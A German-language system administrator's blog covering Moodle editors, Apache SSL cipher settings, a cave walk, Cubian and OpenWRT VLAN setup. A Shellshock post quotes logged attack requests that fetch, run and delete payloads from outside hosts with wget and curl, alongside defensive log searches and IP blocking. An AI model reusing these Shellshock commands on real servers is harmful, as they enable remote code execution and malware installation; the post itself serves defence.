Atto, TinyMCE und Moodle 2.7.x

Mit der Schule bin ich gestern erst auf die Moodle 2.7.2er Reihe von 2.6.5 aus umgestiegen. Da etwas länger zu warten bringt am Ende weniger Bugs und Ärger. Abgesehen von einer Anpassung der Aufgabenformate ist mir aufgefallen, dass nun Atto als Default-Editor keinen Schalter für Emoticons mehr zeigte. Dieser lässt sich aber nachrüsten:

Unter /Plugins /Texteditoren /Texteditor Atto /Einstellungen findet man eine Liste der Editorenfunktionen und darunter ein Feld, in das man seine Ergänzungen eintragen kann oder über das man die Reihenfolge der Knöpfe verändert.

Ein emoticon = emoticon fügt Atto den wichtigsten Knopf im System wieder hinzu.

Will man lieber gleich zum mächtigeren TinyMCE wechseln, dann schiebt man diesen unter /Texteditoren /Übersicht über Atto.

Da ist dann der Emoticon-Schalter gleich wieder mit dabei.

Nebenwirkungen

TinyMCE verwendet DragMath als Formeleditor. Das bedeutet Java Plugins müssen im Browser aktiviert werden können (IcedTea). Atto nutzt hierfür MathJAX. Das klappt zwar ohne Java – dafür lädt sich dieser Formeleditor Code aus den USA nach und was dabei in die andere Richtung über den Atlantik geht, weiß wieder keiner.

Man hat demnach die Wahl zwischen Java und NSA. Super.

SSL, Apache, Komfort und Sicherheit II

Kompatibilität und Sicherheit lassen sich mit den folgenden Zeilen in der ssl.conf des Apache ganz ordentlich verwirklichen:

SSLHonorCipherOrder on
SSLCipherSuite ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS

Getötet werden damit die Browser IE6 und IE8 unter Windows XP sowie BingBot und YahooSlurp, die alle noch kein SNI können und deswegen auf Scolis sowieso auf die Schnauze fallen.

Ich denke, ich hab nun erst einmal einen ordentlichen Kompromiss gefunden.

Via | Beachte: Update des Beitrags!

Selemannsküche, Kolkloch und Klufthalle

Von Wilflingen kommend und der L268 folgend findet man direkt am Waldrand einen Weg in ein Tal auf dessen rechter Talseite man einen Felsen findet, der wie Schweizer Käse aussieht.

https://www.openstreetmap.org/#map=16/48.1258/9.3385

Die Höhle(n) in diesem nennen sich Selemannsküche. Woher der Name kommt, muss ich noch recherchieren. Ein Fels mit sieben Löchern, die teilweise miteinander verbunden sind – so war die Beschreibung im Binder nicht, sonst hätte ich mich dort schon viel früher eingefunden.

In unmittelbarer Nachbarschaft zur Selemannsküche befindet sich auch das Kolkloch – eine Höhle auf zwei Stockwerken, die über einen kleinen Kamin miteinander verbunden sind. Steht man in der unteren Höhle kann man den Kopf in der oberen haben. Ein Körper in zwei Höhlen – nett.

Zu Recht nicht einmal erwähnt wird eine weitere, ca. 2m lange / kleine Klufthöhle auf dem Weg vom Kolkloch nach Unten zum Weg. Auch am Hand gegenüber der Selemannsküche hat es noch (mindestens) zwei derartige Kleinstlöcher, die zumindest für kleinere Kinder Möglichkeiten zum Schlufen bieten.

Folgt man dem Weg weiter talaufwärts findet man hinter der nächsten Kurve, rund 50m weiter, auf der linken Talseite eine weitere Höhle – die Klufthalle.

Hinter einem hübschen, gotisch anmutendem Eingangstor befindet sich eine kleine Halle. Nach links geht ein Gang wieder nach Außen, nach rechts endet ein Gang entlang einer Kluft bald im Versturz.

Die Länge der Klufthalle ist im Binder, wie auch die Länge aller anderen Höhlen in diesem hübschen Tal, sehr optimistisch angegeben. Sehenswert sind die Karstformen hier aber auf jeden Fall.

Schon ganz zu Beginn des Weges an der L268 findet man auf der linken Seite des Weges ein Gebiet, das ich abwechselnd als Höhlenruinen, Dolinen oder Steinbruch deuten wollte. Steinbruch trifft wohl am ehesten zu. Ein schöner Einstieg in einen kurzen Spaziergang zu all den anderen „Spielplätzen“.

Cubian X1

Die Installation von Cubian X1 mit Mate-Desktop ist gegenüber Cubian mit LXDE-Desktop [1,2] noch einmal vereinfacht worden, was vor allem auch daran liegt, dass a) eine menügeführte Konfiguration nach dem ersten Boot (cubian-config) vorhanden ist und b) Mate von Haus aus Interventionen des mausverwöhnten Benutzers erleichtert.

Ein paar Anmerkungen zur Konfiguration:

Wer die Fensterknöpfe lieber links haben will, kann sich diese mit Hilfe des dconf-editors dort hin legen.

Ein Autologin kann im Loginmanager SLiM unter /etc/slim.conf eingestellt werden. Die Datei ist so gut durchkommentiert, dass sich weitere Hinweise verbieten.

Mein Logitech K400r Keyboard mit Touchpad wurde wieder reibungslos erkannt, das nur nebenbei, als ich eine 102 Tasten-Tastatur einstellte.

Die Verwaltungssoftware ajenti habe ich – wie auch einen vorinstallierten apache, gleich gestoppt und deinstalliert. Ich will das lieber selbst in der Hand behalten.

Positiv anzumerken ist viel:

Z.B. dass Cubietruck nun die volle HD Auflösung des TVs über HDMI zu nutzen weiß. Das ist für Bilderfluten gut – für die Arbeit auf der Shell jedoch weniger. Hier muss man sich entscheiden, ob man über STRG + die Zeichengröße anpasst oder gleich einen größeren Font für das Terminal einstellt.

Oder dass der als Standardbrowser vorinstallierte Chromium so konfiguriert ist, dass man Flash-Filmchen abspielen kann. Nett – wenn auch auf dieser Geräteklasse eher ermüdend. Einen Klick auf „Vollbild“ sollte man sich sparen.

GIMP und Libreoffice bleiben auch unter Cubian X1 Mate bedienbar und selbst Icedove oder Iceweasel kann man nutzen, wenn man an Add-ons spart. Bei Ausflügen ins Netz muss man sich jedoch gedulden und das Öffnen vieler Tabs sollte man sich ebenfalls sparen. Als Bürorechner kann ich einen Cubietruck also nicht empfehlen. Eine „richtige Lösung“ (z.B. eine ZBox oder einen NUC mit kleiner SSD und 4GB RAM) kostet zwar mindestens doppelt so viel, aber funktioniert dafür auch reibungslos im Alltag.

Eine ganze Weile habe ich mich an einem zerschossenen CUPS abgearbeitet. Nachdem die Installation von cups-pdf fehlschlug und hierbei CUPS mit in den Abgrund riss fanden netstat und nmap zwar Port 631 von CUPS auf TCP und UDP belegt – aber der CUPS-Server war trotzdem nicht auf localhost im Browser zu erreichen. Bis ich mal auf die Idee kam, /etc/network/interfaces daraufhin zu überprüfen, ob überhaupt eine derartige Schnittstelle definiert ist … Nachdem dann also lo und eth0 der Verwaltung des Gnome network-manager entzogen waren lief CUPS brav im Browser. Der Networkmanager ist in /etc/NetworkManager/NetworkManager.conf auf „Mischbetrieb“ vorkonfiguriert, so dass eine /etc/network/interfaces mit dem folgenden Inhalt reichte:

# Loopback Interface
auto lo
iface lo inet loopback

# Not managed by NWM
allow-hotplug eth0
iface eth0 inet dhcp

Sollte CUPS dann noch immer zicken, lohnt der Versuch, /etc/hosts auf das Vorhandensein einer Zeile 127.0.0.1 localhost hin zu checken (hier war bei mir nur der Hostname aus /etc/hostname zu finden) und in der /etc/cups/cupsd.conf versuchsweise das

Listen localhost:631

durch

Listen 127.0.0.1:631

zu ersetzen und dann im Browser dezidiert diese Adresse aufzurufen.

Zu sicher

Beachte: Update des Beitrags!

Nach den Anpassungen der Apache Configuration in Folge des Poodle Bugs erhielt ich zu Beginn der Woche eine Rückmeldung einer Vista Nutzerin aus dem Kollegium, dass sie nicht mehr auf unsere Seiten zugreifen könne. Ich nahm das zuerst nicht weiter ernst, tippte auf lokale Probleme. Dann stellte ich unter Cubian X fest, dass Chromium nur noch einen 113er Fehler anzeigte, der für

ERR_SSL_VERSION_OR_CIPHER_MISMATCH

steht und Iceweasel merkte an

ssl_error_no_cypher_overlap

Diverse Browser unter Android 4.0.3 (Lightning, Tint Browser, Zirco) wollten ebenfalls nicht mehr meine eigenen HTTPS verschlüsselten Seiten aufrufen. Während unter Android der Firefox noch einsetzbar war, so ging auf meinem Spielkistchen mit Cubian X gar nichts mehr. Die Software auf diesem System lässt sich nicht einfach aktualisieren – meine Apache-Konfiguration war für das Ding schlicht „zu sicher“.

Ich kam dann irgendwann auf Idee, die unterstützten Cipher Suiten miteinander zu vergleichen. Das geht direkt bei Qualys SSL Labs – oder für den Browser auch hier: https://cc.dcsec.uni-hannover.de/check . Die Schuppen fielen dann endlich von den Augen.

Sichere Konfiguration

Eintrag:

SSLProtocol all -SSLv2 -SSLv3

SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2:!SSLv3:!EXPORT

Ergebnis unter Debian:

Unterstützte Browsersuiten:

Handshake Simulation
Android 2.3.7 No SNI ²	Protocol or cipher suite mismatch		Fail³
Android 4.0.4	Protocol or cipher suite mismatch		Fail³
Android 4.1.1	Protocol or cipher suite mismatch		Fail³
Android 4.2.2	Protocol or cipher suite mismatch		Fail³
Android 4.3	Protocol or cipher suite mismatch		Fail³
Android 4.4.2	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
BingBot Dec 2013 No SNI ²	Protocol or cipher suite mismatch		Fail³
BingPreview Jun 2014	Protocol or cipher suite mismatch		Fail³
Chrome 37 / OS X R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (`0xc02f`) FS	128
Firefox 24.2.0 ESR / Win 7	Protocol or cipher suite mismatch		Fail³
Firefox 32 / OS X R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (`0xc02f`) FS	128
Googlebot Jun 2014	Protocol or cipher suite mismatch		Fail³
IE 6 / XP No FS ¹ No SNI ²	Protocol or cipher suite mismatch		Fail³
IE 7 / Vista	Protocol or cipher suite mismatch		Fail³
IE 8 / XP No FS ¹ No SNI ²	Protocol or cipher suite mismatch		Fail³
IE 8-10 / Win 7 R	Protocol or cipher suite mismatch		Fail³
IE 11 / Win 7 R	TLS 1.2	TLS_RSA_WITH_AES_128_CBC_SHA256 (`0x3c`) No FS	128
IE 11 / Win 8.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
IE Mobile 10 / Win Phone 8.0	Protocol or cipher suite mismatch		Fail³
IE Mobile 11 / Win Phone 8.1	TLS 1.2	TLS_RSA_WITH_AES_128_CBC_SHA256 (`0x3c`) No FS	128
Java 6u45 No SNI ²	Protocol or cipher suite mismatch		Fail³
Java 7u25	Protocol or cipher suite mismatch		Fail³
Java 8b132	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (`0xc027`) FS	128
OpenSSL 0.9.8y	Protocol or cipher suite mismatch		Fail³
OpenSSL 1.0.1h	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
Safari 5.1.9 / OS X 10.6.8	Protocol or cipher suite mismatch		Fail³
Safari 6 / iOS 6.0.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 7 / iOS 7.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 8 / iOS 8.0 Beta R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 6.0.4 / OS X 10.8.4 R	Protocol or cipher suite mismatch		Fail³
Safari 7 / OS X 10.9 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Yahoo Slurp Jun 2014 No SNI ²	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
YandexBot Sep 2014	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
(1) Clients that do not support Forward Secrecy (FS) are excluded when determining support for it.
(2) No support for virtual SSL hosting (SNI). Connects to the default site if the server uses SNI.
(3) Only first connection attempt simulated. Browsers tend to retry with a lower protocol version.
(R) Denotes a reference browser or client, with which we expect better effective security.
(All) We use defaults, but some platforms do not use their best protocols and features (e.g., Java 6 & 7, older IE).

Überarbeitete Konfiguration

Eintrag:

SSLProtocol all -SSLv2 -SSLv3

SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5

Ergebnis unter Debian:

Unterstützte Browsersuiten:

Handshake Simulation
Android 2.3.7 No SNI ²	TLS 1.0	TLS_RSA_WITH_RC4_128_SHA (`0x5`) No FS RC4	128
Android 4.0.4	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Android 4.1.1	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Android 4.2.2	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Android 4.3	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Android 4.4.2	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
BingBot Dec 2013 No SNI ²	TLS 1.0	TLS_RSA_WITH_AES_128_CBC_SHA (`0x2f`) No FS	128
BingPreview Jun 2014	TLS 1.0	TLS_DHE_RSA_WITH_AES_256_CBC_SHA (`0x39`) FS	256
Chrome 37 / OS X R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (`0xc02f`) FS	128
Firefox 24.2.0 ESR / Win 7	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Firefox 32 / OS X R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (`0xc02f`) FS	128
Googlebot Jun 2014	TLS 1.0	TLS_ECDHE_RSA_WITH_RC4_128_SHA (`0xc011`) FS RC4	128
IE 6 / XP No FS ¹ No SNI ²	Protocol or cipher suite mismatch		Fail³
IE 7 / Vista	TLS 1.0	TLS_RSA_WITH_AES_128_CBC_SHA (`0x2f`) No FS	128
IE 8 / XP No FS ¹ No SNI ²	TLS 1.0	TLS_RSA_WITH_RC4_128_SHA (`0x5`) No FS RC4	128
IE 8-10 / Win 7 R	TLS 1.0	TLS_RSA_WITH_AES_128_CBC_SHA (`0x2f`) No FS	128
IE 11 / Win 7 R	TLS 1.2	TLS_RSA_WITH_AES_128_CBC_SHA256 (`0x3c`) No FS	128
IE 11 / Win 8.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
IE Mobile 10 / Win Phone 8.0	TLS 1.0	TLS_RSA_WITH_AES_128_CBC_SHA (`0x2f`) No FS	128
IE Mobile 11 / Win Phone 8.1	TLS 1.2	TLS_RSA_WITH_AES_128_CBC_SHA256 (`0x3c`) No FS	128
Java 6u45 No SNI ²	TLS 1.0	TLS_RSA_WITH_RC4_128_SHA (`0x5`) No FS RC4	128
Java 7u25	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (`0xc013`) FS	128
Java 8b132	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (`0xc027`) FS	128
OpenSSL 0.9.8y	TLS 1.0	TLS_DHE_RSA_WITH_AES_256_CBC_SHA (`0x39`) FS	256
OpenSSL 1.0.1h	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
Safari 5.1.9 / OS X 10.6.8	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (`0xc013`) FS	128
Safari 6 / iOS 6.0.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 7 / iOS 7.1 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 8 / iOS 8.0 Beta R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Safari 6.0.4 / OS X 10.8.4 R	TLS 1.0	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (`0xc014`) FS	256
Safari 7 / OS X 10.9 R	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (`0xc028`) FS	256
Yahoo Slurp Jun 2014 No SNI ²	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
YandexBot Sep 2014	TLS 1.2	TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (`0xc030`) FS	256
(1) Clients that do not support Forward Secrecy (FS) are excluded when determining support for it.
(2) No support for virtual SSL hosting (SNI). Connects to the default site if the server uses SNI.
(3) Only first connection attempt simulated. Browsers tend to retry with a lower protocol version.
(R) Denotes a reference browser or client, with which we expect better effective security.
(All) We use defaults, but some platforms do not use their best protocols and features (e.g., Java 6 & 7, older IE).

SSL Check

Beachte: Update des Beitrags!

Ich bin mal meine Domains durchgegangen und habe deren Vertrauenswürdigkeit getestet. Was offensichtlich überall nicht richtig funktioniert ist Perfect Forward Secrecy mit jedem beliebigen Browser. Nur wenn dieser selbst nach den entsprechenden Verschlüsselungsverfahren fragt (Firefox tut dies), dann bekommt der auch PFS geliefert.

Apache 2.2 auf Debian erreicht ein A-. Geholfen hat erst der folgende Eintrag in die Konfigurationsdatei des Apachen:

SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2:!SSLv3:!EXPORT

Alles, was ich davor probierte oder gar aus der Konfiguration von Apache 2.4 Servern auf Apache 2.2 übernahm, führte zu heftigem Abzug bei der Wertung.

Apache 2.4 erreicht ebenfalls ein A- und zeigt das gleiche PFS Problem.

WPS Office

WPS hat auf Android nicht den schlechtesten Ruf. Es ist kostenlos erhältlich und darüber hinaus kann es ganz ordentlich mit DOC und DOCX umgehen. Das Office Paket gibt es auch für Linux hier http://wps-community.org/, so richtig dazu raten kann ich aber nicht: Der Umgang mit DOCX Dateien ist aus meiner Sicht nicht besser als im aktuellsten LibreOffice 4.3.2.2 und es kann mit ODTs nichts anfangen.

Die GUI des Programms ähnelt auf den ersten Blick der von Office 2007 an aufwärts. Die meisten Bedienelemente befinden sich in einer relativen hohen Leiste oben im Fenster.

Dazu kommt dann auf Wunsch eine Leiste auf der rechten Seite.

Bei der aktullen A15 Beta hat es obendrein noch ein paar ganz besondere Glitches: Wie man den im Bild oben angezeigten Formatvorlagen schon ansehen kann: Die Übersetzung ist noch lückenhaft. Das würde bei einem englischen Programm nicht stören, hier wirkt es aber tödlich.

Und: WPS erzwingt die rechtsseitige Anordnung der Fensterknöpfe im Hauptfenster. Die Fensterumrandungen des Betriebssystems werden ausgeblendet. In Submenüs, im Bild oben das Fenster im Vordergrund, tauchen die Knöpfe des Desktopthemes wieder auf – in diesem Fall also links. Das nervt schon nach ein paar Minuten kolossal.

OpenWRT und VLAN

Den schulischen APs der Reihe nach beizubringen, dass sie nun VLAN können und dass

auf Grau der AP verwaltet wird und hierbei seine IP vom grauen DHCP erhält,
Blau unser öffentliches Netz ist (HotSpot Authentifizierung),
auf Pink irgendwann in ferner Zukunft das Lehrernetz gefunden werden soll (mit Radius-Auth – man darf ja noch träumen)
und in Grün das interne Netz für die Laptops läuft, die ihre IP vom Schulserver erhalten,

war die Aufgabe. Dies auf der Oberfläche eines jeden APs einzeln zusammen zu klicken dauert viel zu lange. Also kopiert man sich die Konfiguration von einem funktionierenden AP auf alle anderen, bootet diese insgesamt zwei mal neu und voila – es tut.

Erst einmal VLAN ermöglichen:

opkg install kmod-macvlan

Dann neu booten. Mit ifconfig angesehen soll es am Ende so aussehen:

    br-blue Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet6 addr: fd34:cf26:d77b::1/60 Scope:Global
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:100 errors:0 dropped:0 overruns:0 frame:0
    TX packets:166 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:9114 (8.9 KiB) TX bytes:14396 (14.0 KiB)

    br-green Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet6 addr: fd34:cf26:d77b:10::1/60 Scope:Global
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:2354 errors:0 dropped:0 overruns:0 frame:0
    TX packets:166 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:749902 (732.3 KiB) TX bytes:14396 (14.0 KiB)

    br-grey Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet addr:192.168.0.139 Bcast:192.168.0.255 Mask:255.255.255.0
    inet6 addr: fd34:cf26:d77b:20::1/60 Scope:Global
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1847 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1689 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:175780 (171.6 KiB) TX bytes:431449 (421.3 KiB)

    br-pink Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1773 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:574414 (560.9 KiB)

    eth0 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:9283 errors:0 dropped:167 overruns:0 frame:0
    TX packets:7976 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:1947524 (1.8 MiB) TX bytes:5061428 (4.8 MiB)
    Interrupt:4

    eth0.1 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:2335 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1729 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:211878 (206.9 KiB) TX bytes:434729 (424.5 KiB)

    eth0.2 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:4566 errors:0 dropped:0 overruns:0 frame:0
    TX packets:801 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:1141302 (1.0 MiB) TX bytes:80814 (78.9 KiB)

    eth0.3 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:2208 errors:0 dropped:0 overruns:0 frame:0
    TX packets:3708 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:410171 (400.5 KiB) TX bytes:3944129 (3.7 MiB)

    eth0.4 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1734 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:569420 (556.0 KiB)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:6 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:288 (288.0 B) TX bytes:288 (288.0 B)

    wlan0 Link encap:Ethernet HWaddr 64:70:02:78:1D:5F
    inet6 addr: fe80::6670:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:595 errors:0 dropped:0 overruns:0 frame:0
    TX packets:2903 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:63160 (61.6 KiB) TX bytes:940426 (918.3 KiB)

    wlan0-1 Link encap:Ethernet HWaddr 66:70:02:78:1D:5F
    inet6 addr: fe80::6470:2ff:fe78:1d5f/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:3617 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1995 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:3938021 (3.7 MiB) TX bytes:460510 (449.7 KiB)

Einmal /etc/config/network anpassen:

    config interface 'loopback'
    option ifname 'lo'
    option proto 'static'
    option ipaddr '127.0.0.1'
    option netmask '255.0.0.0'

    config globals 'globals'
    option ula_prefix 'fd34:cf26:d77b::/48'

    config interface 'grey'
    option ifname 'eth0.1'
    option type 'bridge'
    option proto 'dhcp'
    option ip6assign '60'

    config interface 'green'
    option ifname 'eth0.2'
    option type 'bridge'
    option ip6assign '60'

    config interface 'blue'
    option ifname 'eth0.3'
    option type 'bridge'
    option ip6assign '60'

    config interface 'pink'
    option ifname 'eth0.4'
    option type 'bridge'
    option proto 'dhcp'
    option ip6assign '60'

    config switch
    option name 'switch0'
    option reset '1'
    option enable_vlan '1'

    config switch_vlan
    option device 'switch0'
    option vlan '1'
    option vid '1
    option ports '0t 1t 2t 3t 4t 5t'

    config switch_vlan
    option device 'switch0'
    option vlan '2'
    option vid '2'
    option ports '0t 1t 2t 3t 4t 5t'

    config switch_vlan
    option device 'switch0'
    option vlan '3'
    option vid '3'
    option ports '0t 1t 2t 3t 4t 5t'

    config switch_vlan
    option device 'switch0'
    option vlan '4'
    option vid '4'
    option ports '0t 1t 2t 3t 4t 5t'

Und /etc/config/wireless anpassen:

    config wifi-device 'radio0'
    option type 'mac80211'
    option hwmode '11ng'
    option path 'platform/ath9k'
    list ht_capab 'SHORT-GI-40'
    list ht_capab 'DSSS_CCK-40'
    option country 'US'
    option txpower '27'
    option channel '4'

    config wifi-iface
    option device 'radio0'
    option network 'green'
    option mode 'ap'
    option ssid 'intern'
    option encryption 'psk2'
    option key 'geheim'

    config wifi-iface
    option device 'radio0'
    option mode 'ap'
    option encryption 'none'
    option ssid 'public'
    option network 'blue'

Die DNS Dienste auf dem AP wegwerfen, weil der DNS zentral läuft (auf Schulserver oder auf dem grauen Server für die Infrastruktur):

/etc/init.d/dnsmasq stop
killall dnsmasq # nur zur Sicherheit
/etc/init.d/dnsmasq disable

Dann noch einmal neu booten und vor Ort testen, nachdem man die VLAN Einstellungen auch auf den Switches so angepasst hat, dass man seinen AP wieder findet.

Shellshock exploits

Kaum ist der Bug bekannt, listet Exploit-DB einen exploit dazu und ein Metasploit Modul gibt es auch. Das macht es leichter, in den eigenen Logs nach Angriffen zu suchen:

grep „{ :;};“ /var/log/apache2/access.log

bzw. auch mit zgrep, sollen die komprimierten Logs ebenfalls einen Blick wert sein. Wer noch geiler grep-en will: http://rubular.com/r/FRoObXn9Kx

Und da sind sie dann auch schon: Einmal als ein Test auf CGI

89.207.135.125 – – [25/Sep/2014:10:34:22 +0200] „GET /cgi-sys/defaultwebpage.cgi HTTP/1.0“ 404 506 „-“ „() { :;}; /bin/ping -c 1 198.101.206.138“

aber auch als Versuch, von anderen Seiten Executables oder Skripte nachzuladen:

66.150.114.30 – – [27/Sep/2014:04:56:38 +0200] „GET /test HTTP/1.0“ 404 484 „-“ „() { :;}; /bin/bash -c \“wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\““

192.227.213.66 – – [26/Sep/2014:16:09:16 +0200] „GET /cgi-bin/helpme HTTP/1.0“ 404 376 „-“ „() { :;}; /bin/bash -c \“cd /dev/shm;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\““

Man kann dann mal nach in den letzten 3 Tagen geänderten Dateien in verdächtigen oder besonders relevanten Verzeichnissen suchen

find /etc -type f -mtime -3 -printf ‚%TY-%Tm-%Td %TT %p\n‘ | sort

oder mit

nmap localhost

nachsehen, welche Ports auf der eigenen Maschine inzwischen offen sind oder mit

netstat -tulpen

nach aktiven Verbindungen fanden. Aber so richtig was bringen dürfte das auch nur, wenn man die Verzeichnisse gut eingrenzen kann und der erfolgreiche Angreifer nicht aufräumte.

Steht man auf Schlangenöl (wer würde dies nicht) blockiert man die IPs, von denen schon Angriffe kamen mit iptables. Am besten gleich, indem man sich eine function für die .bashrc schreibt:

function blockip () { /sbin/iptables -A INPUT -s $1 -j DROP ; }

Dann reicht ein

blockip 89.207.135.125,66.150.114.30

um zwei IPs zu blockieren – weitere kann man ja mit , getrennt noch hinten anfügen.

Lektüre gefällig? Z.B. hier und da und die jeweils verlinkten Seiten. Das bringt einem aber schlaflose Nächte – wohingegen: Schlangenöl beruhigt die Nerven.

LDAPs von DokuWiki auf LD-Server

In unser Portfolio sollen nur die Kolleg/innen reinkommen und nicht die Schüler/innen. Also authentifizierte dieses zunächst nur gegenüber dem Lehrermoodle – seit ein paar Tagen jedoch auch gegenüber dem hausinternen LDAP-Server über eine verschlüsselte Verbindung.

DokuWiki, die Basis für das Portfoliosystem, erlaubt hierbei jegliche Mischung aus Authentifizierungsverfahren, sofern man das Plugin AuthChained installiert hat. In unserem Fall lege ich die Administratoren und Redakteure händisch in der DokuWiki eigenen Datenbank an – die nur lesenden Benutzer/innen dürfen über LDAPs kommen. Sie sollen in der Default-Gruppe visitor landen, die im Backend von Dokuwiki so eingerichtet wurde, dass sie nur lesenden Zugriff auf die Portfolio-Seiten erhalten.

